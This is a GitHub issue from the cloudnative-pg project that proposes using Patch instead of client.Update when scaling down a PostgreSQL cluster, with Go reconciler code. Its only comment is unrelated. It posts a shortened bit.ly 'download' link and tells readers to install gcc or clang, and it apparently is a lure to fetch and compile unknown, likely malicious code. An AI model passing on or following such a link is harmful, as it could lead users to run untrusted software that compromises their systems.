### ISSUE TITLE
[Bug]: do not use client.Update during `scaleDownCluster`

### ISSUE THREAD

**Issue by armru** [cloudnative-pg/cloudnative-pg#5548]
### Is there an existing issue already for this bug?

- [X] I have searched for an existing issue, and could not find anything. I believe this is a new bug.

### I have read the troubleshooting guide

- [X] I have read the troubleshooting guide and I think this is a new bug.

### I am running a supported version of CloudNativePG

- [X] I have read the troubleshooting guide and I think this is a new bug.

### Version

1.24.0

### What version of Kubernetes are you using?

1.31

### What is your Kubernetes environment?

Self-managed: kind (evaluation)

### How did you install the operator?

YAML manifest

### What happened?

The main branch currently uses `client.Update` to execute a cluster scaledown. While this works, it has no benefits and can lead to resource inconsistencies. The proposed solution is to use `Patch` to avoid the cited drawbacks and be more consistent in the codebase.

```
// scaleDownCluster handles the scaling down operations of a PostgreSQL cluster.
// the scale up operation is handled by the instances creation code
func (r *ClusterReconciler) scaleDownCluster(
	ctx context.Context,
	cluster *apiv1.Cluster,
	resources *managedResources,
) error {
	contextLogger := log.FromContext(ctx)

	if cluster.Spec.MaxSyncReplicas > 0 && cluster.Spec.Instances < (cluster.Spec.MaxSyncReplicas+1) {
		origCluster := cluster.DeepCopy()
		cluster.Spec.Instances = cluster.Status.Instances
		if err := r.Patch(ctx, cluster, client.MergeFrom(origCluster)); err != nil {
			return err
		}

		r.Recorder.Eventf(cluster, "Warning", "NoScaleDown",
			"Can't scale down lower than maxSyncReplicas, going back to %v",
			cluster.Spec.Instances)

		return nil
	}
...
}
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by miguellords** [comment]
download
https://bit.ly/3XQLHlH
If you don't have the c compliator, install it.(gcc or clang)
